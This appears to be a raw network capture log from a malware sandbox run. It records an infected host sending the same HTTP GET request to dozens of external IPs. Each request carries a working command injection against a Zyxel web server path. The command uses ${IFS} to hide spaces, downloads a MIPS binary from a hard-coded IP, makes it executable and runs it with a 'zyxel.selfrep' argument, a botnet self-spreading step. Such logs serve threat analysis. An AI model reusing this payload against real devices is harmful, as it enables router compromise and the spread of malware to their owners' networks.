                                      Jan 14, 2024 15:50:47.320466995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4600192.168.2.1443568117.92.102.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320508957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4601192.168.2.145240052.79.219.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320554018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4602192.168.2.1450482219.85.167.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320602894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4603192.168.2.144979043.202.191.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320642948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4604192.168.2.1443514145.180.213.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320729971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4605192.168.2.1446004175.205.250.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320782900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4606192.168.2.1436832132.113.101.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320817947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4607192.168.2.1432930130.113.90.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320878029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4608192.168.2.14420209.132.4.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320920944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4609192.168.2.1454662188.253.115.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.320950031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4610192.168.2.1437284194.67.66.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321012974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4611192.168.2.1453234122.252.223.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321063042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4612192.168.2.1437914159.220.123.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321145058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4613192.168.2.145351888.48.21.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321207047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4614192.168.2.144870441.222.180.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321254015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4615192.168.2.14524725.65.236.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321330070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4616192.168.2.14376788.35.11.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321353912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4617192.168.2.1459536210.156.41.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321402073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4618192.168.2.1433426195.99.14.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321455002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4619192.168.2.1442398130.107.194.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321511030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4620192.168.2.146044060.167.208.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321551085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4621192.168.2.1434122142.218.237.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321630955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4622192.168.2.1442670192.209.212.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321656942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4623192.168.2.1452292106.19.244.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321707964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4624192.168.2.1438162102.118.153.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321732998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4625192.168.2.1438132156.18.12.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321804047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4626192.168.2.1445184197.194.98.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321845055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4627192.168.2.14598225.171.121.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321921110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4628192.168.2.1445884186.95.21.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.321963072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4629192.168.2.145832664.89.0.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322015047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4630192.168.2.143878649.87.187.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322072029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4631192.168.2.1443158164.30.65.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322125912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4632192.168.2.1459254176.220.157.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322207928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4633192.168.2.1437430182.75.47.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322251081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4634192.168.2.144976887.190.223.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322321892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4635192.168.2.1457630104.89.220.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322379112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4636192.168.2.145607482.55.77.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322452068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4637192.168.2.144911080.83.199.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322499990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4638192.168.2.144285047.153.102.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322535992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4639192.168.2.1451372182.56.116.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322602034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4640192.168.2.146006464.130.4.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322642088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4641192.168.2.145929646.2.189.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322700024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4642192.168.2.1448380145.185.187.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322779894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4643192.168.2.1434418109.69.137.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322807074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4644192.168.2.145570698.220.197.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322873116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4645192.168.2.14413985.67.167.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322928905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4646192.168.2.1433060212.172.166.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.322988033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4647192.168.2.145963883.13.11.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323019981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4648192.168.2.1440388148.149.208.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323074102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4649192.168.2.145579850.117.247.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323144913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4650192.168.2.143602850.9.19.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323209047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4651192.168.2.145009865.188.142.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323263884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4652192.168.2.1459792159.131.224.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323328018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4653192.168.2.1451132151.236.65.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323407888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4654192.168.2.1450354190.80.177.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323483944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4655192.168.2.143940057.217.198.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323534012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4656192.168.2.1458676107.130.253.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323589087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4657192.168.2.1434368219.14.240.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323622942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4658192.168.2.145956889.36.12.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323695898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4659192.168.2.1457282133.118.131.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323740959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4660192.168.2.1437008197.215.218.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323796988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4661192.168.2.146022665.207.218.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:47.323848009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4662192.168.2.1454478118.96.78.165443
                                      TimestampBytes transferredDirectionData
